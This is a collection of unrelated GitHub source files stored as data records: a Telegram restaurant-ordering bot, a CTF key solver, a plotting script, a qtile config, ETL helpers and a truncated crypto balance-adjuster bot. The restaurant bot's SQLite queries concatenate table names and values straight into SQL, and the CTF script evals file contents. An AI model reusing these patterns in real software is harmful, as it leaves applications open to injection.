\", self.rendered_template)\n","repo_name":"armstrong/armstrong.core.arm_sections","sub_path":"tests/template_tags.py","file_name":"template_tags.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"19604593572","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport telebot\nimport config\nimport utils\n\nbot = telebot.TeleBot(config.token)\n\n# Возможно полезная херня с сортированным вложенным меню\n# # Создание сортированного списка разделов меню\n# #sorted_sections_list = sorted(config.menu_keyboard.items(), key=lambda t: t[0]) # Список тьюплов ключ-значение\n# sorted_sections_list = sorted(config.menu_keyboard, key=lambda t: t[0])\n# # Создание словаря клавиатур (клавиатура для каждого раздела)\n# menu_keyboard = [telebot.types.InlineKeyboardMarkup(row_width=2) for i in range(len(sorted_sections_list)+1)]\n# ## Создание сортированного словаря клавиатур (сортировка по названию раздела)\n# #menu_keyboard = OrderedDict(sorted(keyboards_dict.items(), key=lambda t: t[0]))\n# # Создание кнопок для каждой клавиатуры\n# for i, item in enumerate(sorted_sections_list, 1):\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i)+'_'+str(j))\n# for j, button_text in enumerate(config.menu_keyboard[item], 1))\n# menu_keyboard[i].add(*buttons)\n# # Добавление клавиатуры для разделов\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i))\n# for i, button_text in enumerate(config.menu_keyboard, 1))\n# menu_keyboard[0].add(*buttons)\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user_id = str(message.from_user.id)\n print('Бот запущен пользователем', user_id)\n utils.set_basket(user_id)\n bot.send_message(message.chat.id, config.main_menu, parse_mode='markdown', reply_markup=main_menu_keyboard)\n\n# ВОЗВРАТ В МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.back_button, content_types=['text'])\ndef back(message):\n print('Пользователь', message.from_user.id, 'вернулся в основное меню')\n bot.send_message(message.chat.id, config.main_menu, reply_markup=main_menu_keyboard)\n\n# ОПИСАНИЕ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[0], content_types=['text'])\ndef description(message):\n print('Пользователь', message.from_user.id, 'открыл \"Описание\"')\n bot.send_message(message.chat.id, config.description, reply_markup=back_keyboard)\n\n# ФОТОГРАФИИ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[1], content_types=['text'])\ndef photos(message):\n print('Пользователь', message.from_user.id, 'открыл \"Фотографии\"')\n bot.send_message(message.chat.id, config.photos, reply_markup=back_keyboard)\n\n# МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[2], content_types=['text'])\ndef menu(message):\n print('Пользователь', message.from_user.id, 'открыл \"Меню\"')\n bot.send_message(message.chat.id, config.menu, reply_markup=menu_keyboard)\n\n@bot.callback_query_handler(func=lambda query: 'menu' in query.data)\ndef menu_section(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n section_number = int(query.data[5:])\n section = sorted_sections_list[section_number]\n print('Пользователь', user_id, 'открыл \"Раздел меню', section_number+1, '\" в \"Меню\"')\n\n bot.edit_message_text(section, query.message.chat.id, query.message.message_id)\n # ЗДЕСЬ НУЖНА ВЫГРУЗКА БЛЮД РАЗДЕЛА ИЗ БД\n for item in config.menu_keyboard[section]:\n bot.send_message(query.message.chat.id, item, reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '->' in query.data)\ndef amount_inc(query):\n 
bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n item = query.data.split('_')[1]\n\n utils.add_to_basket(user_id, item)\n if 'b->' in query.data:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '<-' in query.data)\ndef amount_dec(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n chat_id = query.message.chat.id\n item = query.data.split('_')[1]\n\n utils.remove_amount(user_id, item)\n if not utils.item_amount(user_id, item):\n utils.del_from_basket(user_id, item)\n if 'b<-' in query.data:\n bot.delete_message(chat_id, query.message.message_id)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n elif 'b<-' in query.data:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: query.data == 'to_basket')\ndef to_basket(query):\n bot.answer_callback_query(query.id)\n basket(str(query.from_user.id), query.message.chat.id)\n\n# BASKET\n\ndef basket(user_id, chat_id):\n _basket = utils.get_basket(user_id)\n print('User', user_id, 'opened \"Basket\"')\n print(utils.get_basket(user_id))\n\n if not _basket:\n bot.send_message(chat_id, config.basket)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.send_message(chat_id, config.basket, reply_markup=pay_keyboard)\n for item in _basket:\n bot.send_message(chat_id, item, reply_markup=amount_keyboard(user_id, item, basket=True))\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[3], content_types=['text'])\ndef _basket(message):\n basket(str(message.from_user.id), message.chat.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'amount')\ndef item_amount(query):\n print(utils.get_basket(str(query.from_user.id)))\n bot.answer_callback_query(callback_query_id=query.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'remove')\ndef remove(query):\n bot.answer_callback_query(callback_query_id=query.id)\n\n utils.del_from_basket(str(query.from_user.id), query.data[7:])\n bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id)\n print(utils.get_basket(str(query.from_user.id)))\n if not utils.get_basket(str(query.from_user.id)):\n bot.send_message(chat_id=query.message.chat.id, text=config.empty_basket)\n\n# ORDER CHECKOUT\n\n@bot.message_handler(func=lambda item: item.text == config.pay_button, content_types=['text'])\ndef payment(message):\n print('User', message.from_user.id, 'started placing an order')\n pay_way_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_way_keyboard.add(telebot.types.KeyboardButton(config.pay_way[0]),\n telebot.types.KeyboardButton(config.pay_way[1]),\n telebot.types.KeyboardButton(config.back_button))\n bot.send_message(message.chat.id, config.choose_pay_way, reply_markup=pay_way_keyboard)\n\n# DATA FOR EACH PRODUCT IN THE BASKET NEEDS TO BE LOADED FROM THE 
DB HERE\n@bot.message_handler(func=lambda item: item.text == config.pay_way[0], content_types=['text'])\ndef pay_newAPI(message):\n print('User', message.from_user.id, 'is placing an order via Telegram')\n bot.send_message(message.chat.id, config.view_basket, reply_markup=back_keyboard)\n msg = ''\n price = 0\n for item in utils.get_basket(str(message.from_user.id)):\n # I HOPE NO EXPLANATION IS NEEDED HERE, BUT IF ANYTHING, CALL ME :-*\n amount = utils.item_amount(str(message.from_user.id), item)\n msg += ' - ' + item + ': ' + str(amount) + '\\n'\n price += amount * 10000\n prices = [telebot.types.LabeledPrice(config.check_num, price)]\n\n new_pay = telebot.types.InlineKeyboardMarkup(row_width=1)\n new_pay.add(telebot.types.InlineKeyboardButton(text=config.pay, pay=True))\n\n bot.send_invoice(chat_id=message.chat.id,\n title=config.check_num,\n description=msg,\n invoice_payload='invoice',\n provider_token=config.provider_token,\n start_parameter='invoice',\n currency='rub',\n prices=prices,\n need_name=True,\n need_phone_number=True,\n need_shipping_address=True,\n is_flexible=True,\n reply_markup=new_pay)\n\n@bot.shipping_query_handler(func=lambda query: True)\ndef shipping(shipping_query):\n shipping_options = []\n\n shipping_option = telebot.types.ShippingOption('delivery', 'Courier delivery')\n shipping_option.add_price(telebot.types.LabeledPrice('Courier', 10000))\n shipping_options.append(shipping_option)\n\n shipping_option = telebot.types.ShippingOption('sam', 'Pickup')\n shipping_option.add_price(telebot.types.LabeledPrice('Pickup', 0))\n shipping_options.append(shipping_option)\n\n bot.answer_shipping_query(shipping_query_id=shipping_query.id, ok=True, shipping_options=shipping_options,\n error_message=config.error_answer_query)\n\n\n@bot.pre_checkout_query_handler(func=lambda query: True)\ndef checkout(pre_checkout_query):\n bot.answer_pre_checkout_query(pre_checkout_query_id=pre_checkout_query.id,\n ok=True,\n error_message=config.error_pre_checkout)\n\n\n@bot.message_handler(content_types=['successful_payment'])\ndef got_payment(message):\n print('User', message.from_user.id, 'completed an order')\n for item in utils.get_basket(str(message.from_user.id)):\n utils.del_from_basket(str(message.from_user.id), item)\n bot.send_message(chat_id=message.chat.id,\n text=config.successful_payment.format(message.successful_payment.total_amount / 100,\n message.successful_payment.currency),\n parse_mode='Markdown', reply_markup=main_menu_keyboard)\n\nif __name__ == '__main__':\n\n main_menu_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n buttons = (telebot.types.KeyboardButton(text=button_text) for button_text in config.main_menu_keyboard)\n main_menu_keyboard.add(*buttons)\n\n back_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n back_keyboard.add(telebot.types.KeyboardButton(text=config.back_button))\n\n def amount_keyboard(user_id, item, basket=False):\n if basket:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='b<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='b->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.del_from_basket,\n callback_data='remove_' + item))\n elif utils.item_amount(user_id, item):\n amount = telebot.types.InlineKeyboardMarkup()\n 
amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.to_basket, callback_data='to_basket'))\n else:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n\n return amount\n\n ### THE MENU SECTIONS NEED TO BE LOADED FROM THE DB HERE\n menu_keyboard = telebot.types.InlineKeyboardMarkup(row_width=2)\n sorted_sections_list = list(config.menu_keyboard)\n sorted_sections_list.sort()\n buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_' + str(i))\n for i, button_text in enumerate(sorted_sections_list))\n menu_keyboard.add(*buttons)\n ###\n\n pay_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_keyboard.add(telebot.types.KeyboardButton(text=config.pay_button),\n telebot.types.KeyboardButton(text=config.back_button))\n\n hidden_keyboard = telebot.types.ReplyKeyboardRemove()\n\n\nclass sql:\n def tovars(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n company = \"KFC\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM '\"\"\" + str(company) + \"' ORDER BY Блюдо\")\n\n tovars = cursor.fetchall()\n conn.close()\n return tovars\n\n def kitchen(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n cursor.execute(\"\"\"\n SELECT Название\n FROM Кухня\n ORDER BY Название;\n \"\"\")\n kitchen = cursor.fetchall()\n conn.close()\n return kitchen\n def bludo_po_kuhne(self, kitchen_vibor):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n self.kitchen_vibor = \"Фастфуд\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM KFC\n WHERE Кухня = '\"\"\" + str(kitchen_vibor) + \"'\")\n kitchen_price = cursor.fetchall()\n conn.close()\n return kitchen_price\n def bludo_info(self, bludo):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n # Output all information about the dish\n self.bludo = \"Биггер\"\n cursor.execute(\"\"\"\n SELECT *\n FROM KFC\n WHERE Блюдо = '\"\"\" + str(bludo) + \"'\")\n info_food = cursor.fetchall()\n conn.close()\n return info_food\n\n\n\n\n bot.polling(none_stop=True)\n\n\n","repo_name":"eskidnov/restaurant_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
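The sql class in the bot.py record above interpolates values directly into the SQL text. A minimal sketch of a safer variant (not the author's code; it assumes the same KFC table and Кухня/Блюдо columns, and a hypothetical db_path argument) binds the filter value through a sqlite3 placeholder instead:

import sqlite3

def dishes_by_cuisine(db_path, cuisine):
    # Same query as sql.bludo_po_kuhne, but the cuisine value is bound with a
    # "?" placeholder; table and column names still cannot be parameterized.
    conn = sqlite3.connect(db_path)
    cursor = conn.cursor()
    cursor.execute("SELECT Блюдо FROM KFC WHERE Кухня = ?", (cuisine,))
    rows = cursor.fetchall()
    conn.close()
    return rows

# Hypothetical usage mirroring the original call:
# dishes_by_cuisine(config.expl, "Фастфуд")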
+{"seq_id":"26234542611","text":"#!/usr/bin/env python3.4\n\nimport re\n\nwith open('data','rt') as f:\n\tdata = f.read().strip().split('\\n')\ncount = {}\nfor d in data:\n\tcount[d] = d.count('a')\ncount_s = sorted(count.items(), key=lambda x:x[1])\n\nkey = [0]*47\ni = 0\nequ=list(map(lambda x:x[0],count_s))\nfor a in range(len(equ)):\n\tfor c in range(33,127):\n\t\tp = re.sub('a\\[\\d+\\]',str(c),equ[a])\n\t\tif eval(p):\n\t\t\tkey[i] = c\n\t\t\tequ = list(map(lambda x:x.replace('a[%d]'%i,str(key[i])),equ))\n\t\t\ti += 1\n\t\t\tbreak\nfkey = ''\nfor c in key:\n\tfkey += chr(c)\nprint(fkey)\n","repo_name":"qq53/ctf","sub_path":"simplexue/flag/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4575254323","text":"import sys\nimport csv\nimport matplotlib.pyplot as plt\nfrom datetime import *\nfrom ggplot import *\nimport matplotlib.dates as dt\n\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\n\nNYPD = {}\nd = {}\nTLC = {}\nDPR = {}\ncount = 0\nnext(reader)\nfor i in reader:\n\tcount = d.setdefault(i[3], 0)\n\td[i[3]] = count + 1\n\ntopk = sorted(d.items(), key = lambda x:x[1], reverse = True)\nk = int(sys.argv[2])\ntopk = [x for x,y in topk]\ntopk = topk[:k] \nstart_date = datetime.strptime('06/01/2013 00:00:00 AM', '%m/%d/%Y %H:%M:%S %p')\nf.close()\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\nnext(reader)\ncomplete = {}\nfor i in topk:\n\tcomplete[i] = {}\nfor i in reader:\n\tif i[3] in topk:\n\t\tdate = datetime.strptime(i[1],'%m/%d/%Y %H:%M:%S %p')\n\t\tdelta = date - start_date\n\t\tif int(delta.days) > 90:\n\t\t\tcontinue\n\t\tcount = complete[i[3]].setdefault(int(delta.days), 0)\n\t\tcomplete[i[3]][int(delta.days)] = count + 1\nlabels = complete.keys()\nXY = complete.values()\n\nfig,ax = plt.subplots()\nL = []\nfor i in xrange(0,91):\n\tL.append(start_date + timedelta(days = i))\ncolors = ['b','g','r','c','m','y','k']\nc = 0\nfor i in labels:\n\tc += 1\n\tL = []\n\tX = complete[i].keys()\n\tY = complete[i].values()\n\tfor j in xrange(0,len(X)):\n\t\tL.append(start_date + timedelta(days = j))\n\n\tplt.xticks(X, L, fontsize = 6)\n\tplt.plot(L, Y, colors[c%7], label = i)\n\nplt.legend(loc = 2)\nax.xaxis.set_major_formatter(dt.DateFormatter(\"%b %d %Y\"))\nax.xaxis.set_major_locator(dt.DayLocator((1,8,16,24)))\n\nplt.xlabel('Date')\nplt.ylabel('Number of Complaints')\nplt.show()\n\n\n","repo_name":"rybo449/Matplotlib-Visualizations","sub_path":"problem2_2.py","file_name":"problem2_2.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8589869406","text":"from libqtile.config import Match\nfrom libqtile.layout.columns import Columns\nfrom libqtile.layout.floating import Floating\nfrom libqtile.layout.max import Max\nfrom libqtile.layout.xmonad import MonadWide\n\nfrom colors import OneDark as c\n\n_layout_theme = {\n \"border_width\": 4,\n \"margin\": 8,\n \"border_focus\": c.base0F,\n \"border_normal\": c.base00,\n}\nlayouts = [\n Columns(name=\"cols\", num_columns=3, **_layout_theme),\n Max(),\n # Try more layouts by unleashing below layouts.\n # Stack(num_stacks=2),\n # Bsp(),\n # Matrix(),\n # MonadTall(),\n MonadWide(name=\"wide\", **_layout_theme),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\nfloating_layout = Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\n","repo_name":"jamestrew/dotfiles","sub_path":"qtile/.config/qtile/_layouts.py","file_name":"_layouts.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40344168081","text":"\"\"\"\nThis file contains helper methods used throughout the phases of the ETL pipeline\n\"\"\"\n\nfrom datetime import datetime\nimport pandas as pd\nfrom constants import dataframe\n\ndef create_df(columns):\n \"\"\"\n Create a template dataframe based on columns provided\n\n Input : dictioary - { column name : column data type }\n Output : dataframe \n \"\"\"\n data_frame = pd.DataFrame(columns)\n return data_frame\n\ndef create_template_restaurants_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurants data\n (used for Q1 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.COUNTRY: pd.Series(dtype='str'),\n dataframe.CITY: pd.Series(dtype='str'),\n dataframe.USER_RATING_VOTES: pd.Series(dtype='str'),\n dataframe.USER_AGGREGATE_RATING: pd.Series(dtype='str'),\n dataframe.CUISINES: pd.Series(dtype='str'),\n dataframe.COUNTRY_ID: pd.Series(dtype='int'),\n dataframe.RATING_TEXT: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENTS: pd.Series(dtype='object'),\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str')\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef create_template_events_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurant events data\n in Apr 2019 (used for Q2 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str'),\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef map_country_code_to_country_name(d_countries, country_code):\n \"\"\"\n Returns the country name associated with the provided country code\n based on the countries dictionary of { country code : country name }\n If country code does not exist, return NA\n\n Input : dictionary, string\n Output : string \n \"\"\"\n if country_code in d_countries:\n return d_countries[country_code]\n return dataframe.NA_VALUE\n\ndef event_occurs_within_dates(\n event_start,\n event_end,\n fixed_start,\n fixed_end\n):\n \"\"\"\n Check whether an event occurs within a date range \n\n Input : string, string, string, string\n Output : boolean \n \"\"\"\n return (\n event_start >= datetime.strptime(fixed_start, '%Y-%m-%d')\n and event_end <= datetime.strptime(fixed_end, '%Y-%m-%d')\n )\n\n\ndef replace_na_cells(data_frame, replacement_str):\n \"\"\"\n Replace NaN cells in the dataframe with a provided\n replacement string\n\n Input : dataframe, string \n Output : dataframe \n \"\"\"\n data_frame = data_frame.fillna(replacement_str)\n return data_frame\n\ndef extract_photo_urls(event):\n \"\"\"\n Obtain photo URLs for all photos of each event.\n If there's multiple photo URLs, they are separated by\n a comma delimiter\n\n Input : list\n Output : string\n \"\"\"\n if 'photos' in event:\n photo_urls = list(map(lambda photo: photo['photo']['url'], event['photos']))\n photo_urls_string = \",\".join(photo_urls)\n return photo_urls_string\n return 
dataframe.NA_VALUE\n","repo_name":"ongyongen/de","sub_path":"etl_pipeline/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
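For reference, the date-range check in event_occurs_within_dates above reduces to two datetime comparisons against strptime-parsed bounds. A tiny self-contained illustration with made-up April 2019 dates (it mirrors the helper's logic rather than importing the module):

from datetime import datetime

# Hypothetical event fully inside April 2019, using the same '%Y-%m-%d' bound format.
event_start = datetime(2019, 4, 5)
event_end = datetime(2019, 4, 10)

inside = (
    event_start >= datetime.strptime("2019-04-01", "%Y-%m-%d")
    and event_end <= datetime.strptime("2019-04-30", "%Y-%m-%d")
)
print(inside)  # True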
+{"seq_id":"17917237372","text":"import sys\nimport ccxt\nimport time\nimport signal\nimport re\nimport os\nimport uuid\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nsignal.signal(signal.SIGINT, lambda x,y: os._exit(0))\nfrom flask_socketio import SocketIO, emit\nfrom datetime import datetime\nfrom decimal import Decimal\ndir_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = dir_path+'/../libs'\nsys.path.append(lib_path)\nfrom exchange_lib import *\nfrom common import log, socket_emit\n\n\ndef arg_parser(web_inputs=None):\n args_dict = web_inputs\n if not web_inputs:\n parser = argparse.ArgumentParser(description='Nico bot')\n parser.add_argument('ex_and_coin', type=str, help='Exchanges and coins')\n parser.add_argument('fees', type=str, help='Order fees for the coin and target coin')\n parser.add_argument('target_coin', type=str, help='Target coin')\n parser.add_argument('buyback_exchange', type=str, help='Buyback exchange')\n parser.add_argument('-s', '--threshold', type=str, default='0', help='threshold to adjust (default 0)')\n parser.add_argument('-i', '--interval', type=str, default='1', help='Checking interval in minute (default 1m)')\n parser.add_argument('-b', '--buyback', type=bool, nargs='?', const=True, default=False, help='Buyback')\n args = parser.parse_args()\n args_dict = vars(args)\n # end if\n\n ex_and_coin_list = args_dict.get('ex_and_coin')\n fees = args_dict.get('fees')\n ex_and_coin_fee_dict = {}\n kra_coins = []\n bin_coins = []\n \n for coin, fee in zip(ex_and_coin_list.split('-'), fees.split('-')):\n fee = Decimal(fee)\n ex_id = coin[:3]\n coin_fee_list = ex_and_coin_fee_dict.get(ex_id)\n if not coin_fee_list:\n coin_fee_list = []\n coin_fee_list.append((coin[3:], fee))\n ex_and_coin_fee_dict.update({ex_id: coin_fee_list})\n\n target_coin = args_dict.get('target_coin')\n buyback_exchange = args_dict.get('buyback_exchange')\n checking_interval = float(args_dict.get('interval'))\n threshold = Decimal(args_dict.get('threshold'))\n buyback = args_dict.get('buyback')\n if buyback == 'False':\n buyback = False\n elif buyback == 'True':\n buyback = True\n\n return {\n 'ex_and_coin_fee': ex_and_coin_fee_dict,\n 'checking_interval': checking_interval,\n 'target_coin': target_coin,\n 'buyback_exchange': buyback_exchange,\n 'threshold': threshold,\n 'buyback': buyback,\n 'account_sell_buy': args_dict['account_sell_buy'],\n 'account_buy_sell': args_dict['account_buy_sell'],\n 'own_username': args_dict['own_username']\n }\n\n\nclass balance_adjuster_bot():\n def __init__(self):\n self._exchanges = {}\n self._adjuster_coins = {}\n self._adjuster_coins_in_total = {}\n self._target_coin = ''\n self._buyback_exchange = ''\n self._threshold = 0\n self._buyback = True\n self._args = None\n self._terminate = False\n self._socketio = None\n self._channel_uuid = ''\n self._socketdata = {}\n self._logger = logging.getLogger('BalanceAdjusterBot')\n\n def terminate(self):\n self._terminate = True\n\n def _config_logger(self):\n self._logger.setLevel(logging.DEBUG)\n script_path = os.path.dirname(os.path.realpath(__file__))\n file_name = 'balance_adjuster_cmd_' + datetime.now().strftime('%Y-%m-%dT%H-%M-%S')\n if self._socketio:\n file_name = 'balance_adjuster_web_' + self._channel_uuid\n # create file handler which logs even debug messages\n fh = logging.FileHandler(script_path + '/../web/logs/'+ str(file_name) + '.log')\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n 
fh.setFormatter(formatter)\n self._logger.addHandler(fh)\n\n def _log(self, data='', severity='info'):\n log(data, self._logger, self._socketio, self._channel_uuid, log_severity=severity)\n\n def _get_target_coin_amount_from_coin(self, coin_fee_pair):\n # Check if this coin is direct coin to target coin\n target_coin_amount = Decimal(0)\n buyback_order_amount = Decimal(0)\n order_info = ()\n if coin_fee_pair[-1] != None:\n coin, fee, pair = coin_fee_pair\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n pair = pair[3:]\n buyback_order_side = ''\n buyback_order_amount = Decimal(0)\n coin_position_in_pair = 1 if pair.find(coin) == 0 else 2\n order_book = self._exchanges.get(exchange_id).fetch_order_book(pair, 1)\n pair_price = 0\n coin_amount = self._adjuster_coins_in_total[coin_fee_pair][2]\n # Return None if price isn't initiated yet\n if order_book == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount * pair_price * (1 + fee/100)\n elif coin_amount > 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount * pair_price * (1 - fee/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount / pair_price * (1 + fee/100)\n buyback_order_amount = abs(target_coin_amount)\n elif coin_amount > 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount / pair_price * (1 - fee/100)\n buyback_order_amount = target_coin_amount\n order_info = (pair, buyback_order_side, buyback_order_amount, pair_price)\n # TODO will adapt later to new requirement. 
Indirect coin, hava intermediate coin\n else:\n coin, fees, _ = coin_fee_pair\n pair1, fee1 = fees[0]\n buyback_order_side1 = ''\n buyback_order_amount1 = Decimal(0)\n coin_position_in_pair = 1 if pair1.find(coin) == 0 else 2\n order_book1 = self._exchanges.get(exchange).fetch_order_book(pair1, 1)\n pair1_price = Decimal(0)\n coin_amount = self._adjuster_coins[exchange][coin_fee_pair][2]\n intermediate_coin_amount = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book1 == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount1 = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 + fee1/100)\n elif coin_amount > 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 - fee1/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 + fee1/100)\n buyback_order_amount1 = abs(intermediate_coin_amount)\n elif coin_amount > 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 - fee1/100)\n buyback_order_amount1 = intermediate_coin_amount\n\n pair2, fee2 = fees[1]\n buyback_order_side2 = ''\n buyback_order_amount2 = Decimal(0)\n target_coin_position_in_pair = 1 if pair2.find(self._target_coin) == 0 else 2\n order_book2 = self._exchanges.get(exchange).fetch_order_book(pair2, 1)\n pair2_price = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book2 == (None, None):\n return False, Decimal(0), ()\n\n if target_coin_position_in_pair == 1:\n if intermediate_coin_amount < 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 + fee2/100)\n buyback_order_amount2 = abs(target_coin_amount)\n elif intermediate_coin_amount > 0:\n pair2_price = Decimal(str(order_book2[1][0]))\n buyback_order_side2 = 'buy'\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 - fee2/100)\n buyback_order_amount2 = target_coin_amount\n elif target_coin_position_in_pair == 2:\n buyback_order_amount2 = abs(intermediate_coin_amount)\n if intermediate_coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair2_price = Decimal(str(order_book2[1][0]))\n target_coin_amount = 